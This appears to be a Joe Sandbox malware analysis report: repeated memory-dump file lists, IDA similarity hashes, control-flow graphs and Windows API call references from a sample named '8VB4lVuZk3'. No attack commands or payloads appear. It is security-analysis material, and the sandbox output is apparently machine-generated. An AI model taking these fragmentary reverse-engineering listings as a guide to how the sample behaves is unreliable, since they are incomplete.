                            • Associated: 00000000.00000002.2944124609.000000006D009000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D00F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D021000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6c7a0000_8VB4lVuZk3.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fc7b084d7b0d21771739a076ae349351ca10030ac72a3af76fcf9977e6ceafa8
                            • Instruction ID: 2c1febcfa5fa88a57568e2af68cfac6843c5791a6affeab41ae073a96cdf5aff
                            • Opcode Fuzzy Hash: fc7b084d7b0d21771739a076ae349351ca10030ac72a3af76fcf9977e6ceafa8
                            • Instruction Fuzzy Hash: DBC08C3CB1C288CFEB81CB08C0803007FF0AB1B304F4608C8E4808B350C3BCA440870A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2943336648.000000006C7A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C7A0000, based on PE: true
                            • Associated: 00000000.00000002.2943319489.000000006C7A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CCFA000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943883446.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943904565.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943918725.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943932489.000000006CF72000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943946986.000000006CF77000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944003529.000000006CF79000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944022692.000000006CF91000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944038142.000000006CF93000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944052019.000000006CF97000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944067263.000000006CF98000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB6000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBC000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBF000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFC9000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD8000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D000000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D005000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D009000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D00F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D021000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6c7a0000_8VB4lVuZk3.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6f3f74b1109017a69a3b925dcc665955ad98aa6b084c30251bc14c2bb10f6cd6
                            • Instruction ID: a1ee445c724ea8702d7ee1623ce43b7266980cdcae8bebc431d298345f1a5599
                            • Opcode Fuzzy Hash: 6f3f74b1109017a69a3b925dcc665955ad98aa6b084c30251bc14c2bb10f6cd6
                            • Instruction Fuzzy Hash: 39C001782056009FC705CF08C190855B7E1EB8E611B118499FA568B771D731EC50EA11

                            Control-flow Graph

                            APIs
                              • Part of subcall function 6CC09841: RaiseException.KERNEL32(?,?,6CC44475,?,?,?,?,?,?,?,6CC44475,?,6CF5F46C,?), ref: 6CC09896
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7E3D35
                            • _Smanip.LIBCPMT ref: 6C7E3D4A
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7E3D9A
                            • _Smanip.LIBCPMT ref: 6C7E3DBA
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7E3E0A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2943336648.000000006C7A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C7A0000, based on PE: true
                            • Associated: 00000000.00000002.2943319489.000000006C7A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CCFA000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943883446.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943904565.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943918725.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943932489.000000006CF72000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943946986.000000006CF77000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944003529.000000006CF79000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944022692.000000006CF91000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944038142.000000006CF93000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944052019.000000006CF97000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944067263.000000006CF98000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB6000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBC000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBF000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFC9000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD8000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D000000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D005000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D009000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D00F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D021000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6c7a0000_8VB4lVuZk3.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$Smanip$ExceptionRaise
                            • String ID: +infinity$-infinity$not-a-date-time
                            • API String ID: 3978176290-2863292526
                            • Opcode ID: 2654ad794b99f249d9e81075635932e08650d80d7e99161c63a43b0c3e79fda0
                            • Instruction ID: 87497db9af4834a70259a111ad3b619ed27f6ad7b3c7aec831af75cb4dec8a71
                            • Opcode Fuzzy Hash: 2654ad794b99f249d9e81075635932e08650d80d7e99161c63a43b0c3e79fda0
                            • Instruction Fuzzy Hash: 3A81D3B29043406BD714DB60DD49FDB77ACAB88308F504D29F549A7B81EB31E90D8762

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 148 6c984790-6c9847ad 149 6c9847ba-6c9847c6 148->149 150 6c9847af-6c9847b7 148->150 151 6c9847c8-6c9847ce GetTickCount 149->151 152 6c9847d2-6c9847d7 149->152 151->152 153 6c9847dd-6c9847e3 152->153 154 6c9848ce-6c9848d6 152->154 155 6c9847e9-6c9847f3 153->155 156 6c984829-6c984835 155->156 157 6c9847f5-6c984806 PeekMessageA 155->157 159 6c98485f-6c98488e call 6c7c49d0 call 6cc6e9a0 156->159 160 6c984837-6c98485a GetModuleHandleA GetProcAddress 156->160 157->156 158 6c984808-6c984827 DispatchMessageA TranslateMessage PeekMessageA 157->158 158->156 158->158 166 6c9848bf-6c9848c8 159->166 167 6c984890-6c9848af GetTickCount 159->167 160->159 166->154 166->155 167->150 168 6c9848b5 167->168 168->166 169 6c9848b7-6c9848b9 168->169 169->150 169->166
                            APIs
                            • GetTickCount.KERNEL32 ref: 6C9847C8
                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 6C984802
                            • DispatchMessageA.USER32(?), ref: 6C98480D
                            • TranslateMessage.USER32(?), ref: 6C984814
                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 6C984823
                            • GetModuleHandleA.KERNEL32(KERNEL32.DLL,GetTickCount64), ref: 6C984841
                            • GetProcAddress.KERNEL32(00000000), ref: 6C984848
                            • GetTickCount.KERNEL32 ref: 6C984890
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2943336648.000000006C7A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C7A0000, based on PE: true
                            • Associated: 00000000.00000002.2943319489.000000006C7A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CCFA000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943883446.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943904565.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943918725.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943932489.000000006CF72000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943946986.000000006CF77000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944003529.000000006CF79000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944022692.000000006CF91000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944038142.000000006CF93000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944052019.000000006CF97000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944067263.000000006CF98000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB6000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBC000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBF000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFC9000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD8000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D000000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D005000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D009000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D00F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D021000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6c7a0000_8VB4lVuZk3.jbxd
                            Similarity
                            • API ID: Message$CountPeekTick$AddressDispatchHandleModuleProcTranslate
                            • String ID: GetTickCount64$KERNEL32.DLL
                            • API String ID: 2733022415-3320051239
                            • Opcode ID: 2fc444d79efc70d0e8c8471a828a93c93a52987fe00ac20dabea9916fbf962b6
                            • Instruction ID: 5db1ed570fde2ba7c6097b6adaebd900015f0355d2463b13e880ba10dc24fd87
                            • Opcode Fuzzy Hash: 2fc444d79efc70d0e8c8471a828a93c93a52987fe00ac20dabea9916fbf962b6
                            • Instruction Fuzzy Hash: 1E314A717013009FDB10DF6AD848B4ABBFCAF85714F508A69F865D7A80E774D4488FA1

                            Control-flow Graph

                            APIs
                            • lstrcpyA.KERNEL32(?,SYSTEM\CurrentControlSet\Services\EventLog\Application\,00000000,00000028), ref: 6CAEDAE6
                            • lstrcatA.KERNEL32(?,?), ref: 6CAEDAF4
                              • Part of subcall function 6CAEDC20: RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000,00000000,00000002,00000000,?,6CAEDB0F,00000000,?,6CAEDB0F,?), ref: 6CAEDC44
                            • RegCloseKey.ADVAPI32(00000000,?,?), ref: 6CAEDB5D
                              • Part of subcall function 6CAEDC80: lstrlenA.KERNEL32(?,?,6CAEDB2C,00000000,EventMessageFile,NTEventLogAppender.dll,?,?), ref: 6CAEDC86
                              • Part of subcall function 6CAEDC80: RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000000,?,6CAEDB2C,00000000,EventMessageFile,NTEventLogAppender.dll,?,?), ref: 6CAEDC9A
                              • Part of subcall function 6CAEDC60: RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,6CAEDB4D,00000000,TypesSupported,00000007,00000000,CategoryMessageFile,NTEventLogAppender.dll,00000000,EventMessageFile), ref: 6CAEDC73
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2943336648.000000006C7A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C7A0000, based on PE: true
                            • Associated: 00000000.00000002.2943319489.000000006C7A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CCFA000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943883446.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943904565.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943918725.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943932489.000000006CF72000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943946986.000000006CF77000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944003529.000000006CF79000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944022692.000000006CF91000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944038142.000000006CF93000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944052019.000000006CF97000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944067263.000000006CF98000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB6000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBC000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBF000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFC9000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD8000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D000000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D005000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D009000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D00F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D021000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6c7a0000_8VB4lVuZk3.jbxd
                            Similarity
                            • API ID: Value$CloseCreatelstrcatlstrcpylstrlen
                            • String ID: CategoryCount$CategoryMessageFile$EventMessageFile$NTEventLogAppender.dll$SYSTEM\CurrentControlSet\Services\EventLog\Application\$TypesSupported
                            • API String ID: 2452147993-25712953
                            • Opcode ID: 6161390e3f2ae88538ac1b240cf80bc42f6528e61324a53e76ff7f650340aafc
                            • Instruction ID: e187bf77ce5d85d50465a97ce362be16276bd13c442d6378b44e0baff42b9155
                            • Opcode Fuzzy Hash: 6161390e3f2ae88538ac1b240cf80bc42f6528e61324a53e76ff7f650340aafc
                            • Instruction Fuzzy Hash: 64118235B05118A7CB1097249D44EEF77BDDFC9308F000596F645B3640DBB96A8DA794

                            Control-flow Graph

                            APIs
                            • HeapCreate.KERNEL32(00000005,00000000,00000000,00000000,?,6CA669A5), ref: 6CA663F1
                            • HeapAlloc.KERNEL32(00000000,00000008,00000648,00000000,?,6CA669A5), ref: 6CA66404
                            • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000001,?,6CA669A5), ref: 6CA66418
                            • HeapFree.KERNEL32(00000000,00000000,?,6CA669A5), ref: 6CA6642C
                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,6CA669A5), ref: 6CA66447
                            • GetProcAddress.KERNEL32(00000000,GetQueuedCompletionStatusEx), ref: 6CA66457
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2943336648.000000006C7A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C7A0000, based on PE: true
                            • Associated: 00000000.00000002.2943319489.000000006C7A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CCFA000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943883446.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943904565.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943918725.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943932489.000000006CF72000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943946986.000000006CF77000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944003529.000000006CF79000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944022692.000000006CF91000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944038142.000000006CF93000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944052019.000000006CF97000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944067263.000000006CF98000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB6000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBC000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBF000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFC9000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD8000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D000000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D005000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D009000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D00F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D021000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6c7a0000_8VB4lVuZk3.jbxd
                            Similarity
                            • API ID: Heap$Create$AddressAllocCompletionFreeHandleModulePortProc
                            • String ID: GetQueuedCompletionStatusEx$kernel32.dll
                            • API String ID: 2917928171-3074460875
                            • Opcode ID: 6248a615570ea66d0c864e35b4d76bff2400c1ca853162433d837b7ee232e6df
                            • Instruction ID: dc623a7486ed1c55a69e5eb439491f06a2060fe890953047cbe05c5a4d56ebd0
                            • Opcode Fuzzy Hash: 6248a615570ea66d0c864e35b4d76bff2400c1ca853162433d837b7ee232e6df
                            • Instruction Fuzzy Hash: BA11A171651601BFEF009F3AEC08B56BBF8EF4A721F14811AF829D2A80DB708840CB50

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 193 6cc6e4c0-6cc6e51d 194 6cc6e524-6cc6e529 193->194 195 6cc6e5a0-6cc6e5ac 194->195 196 6cc6e52b-6cc6e536 194->196 197 6cc6e5b6-6cc6e5d1 call 6cc01243 195->197 198 6cc6e5ae-6cc6e5b1 195->198 199 6cc6e53c-6cc6e541 196->199 200 6cc6e5ea-6cc6e5ee 196->200 198->197 201 6cc6e5b3-6cc6e5b4 CloseHandle 198->201 202 6cc6e543-6cc6e546 199->202 203 6cc6e57e-6cc6e57f ResetEvent 199->203 205 6cc6e5f0-6cc6e605 200->205 206 6cc6e649 200->206 201->197 210 6cc6e555-6cc6e56d OpenEventA 202->210 211 6cc6e548-6cc6e552 call 6cc6ef30 202->211 208 6cc6e585-6cc6e59d call 6cc6e660 203->208 205->195 207 6cc6e607-6cc6e60c 205->207 209 6cc6e64c-6cc6e657 WaitForSingleObjectEx 206->209 207->209 213 6cc6e60e-6cc6e611 207->213 208->195 209->194 215 6cc6e577-6cc6e57c 210->215 216 6cc6e56f-6cc6e572 210->216 211->210 218 6cc6e613-6cc6e61d call 6cc6ef30 213->218 219 6cc6e620-6cc6e637 CreateEventA 213->219 215->203 215->208 216->215 217 6cc6e574-6cc6e575 CloseHandle 216->217 217->215 218->219 223 6cc6e641-6cc6e644 219->223 224 6cc6e639-6cc6e63c 219->224 223->194 224->223 227 6cc6e63e-6cc6e63f CloseHandle 224->227 227->223
                            APIs
                            • OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 6CC6E560
                            • CloseHandle.KERNEL32(00000000), ref: 6CC6E575
                            • ResetEvent.KERNEL32(00000000), ref: 6CC6E57F
                            • CloseHandle.KERNEL32(00000000,D2AB1C0E), ref: 6CC6E5B4
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,D2AB1C0E), ref: 6CC6E62A
                            • CloseHandle.KERNEL32(00000000), ref: 6CC6E63F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2943336648.000000006C7A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C7A0000, based on PE: true
                            • Associated: 00000000.00000002.2943319489.000000006C7A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CCFA000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943883446.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943904565.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943918725.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943932489.000000006CF72000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943946986.000000006CF77000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944003529.000000006CF79000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944022692.000000006CF91000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944038142.000000006CF93000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944052019.000000006CF97000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944067263.000000006CF98000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB6000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBC000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBF000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFC9000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD8000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D000000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D005000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D009000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D00F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D021000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6c7a0000_8VB4lVuZk3.jbxd
                            Similarity
                            • API ID: CloseEventHandle$CreateOpenReset
                            • String ID:
                            • API String ID: 1285874450-0
                            • Opcode ID: bc4c68698d16dbf0014be470df1d1c3c7488d232c2fd60d5d2f46d8c82e991ec
                            • Instruction ID: 279adad7db1960954a39355c57562acd7c750b7fbb6a9b241a2fcf08ae660b3d
                            • Opcode Fuzzy Hash: bc4c68698d16dbf0014be470df1d1c3c7488d232c2fd60d5d2f46d8c82e991ec
                            • Instruction Fuzzy Hash: F0513E70D05358AFDF10CBA6CD84B9DB7B8AF05714F24421AE828ABA80F7709905CB91

                            Control-flow Graph

                            • Executed
                            • Not Executed
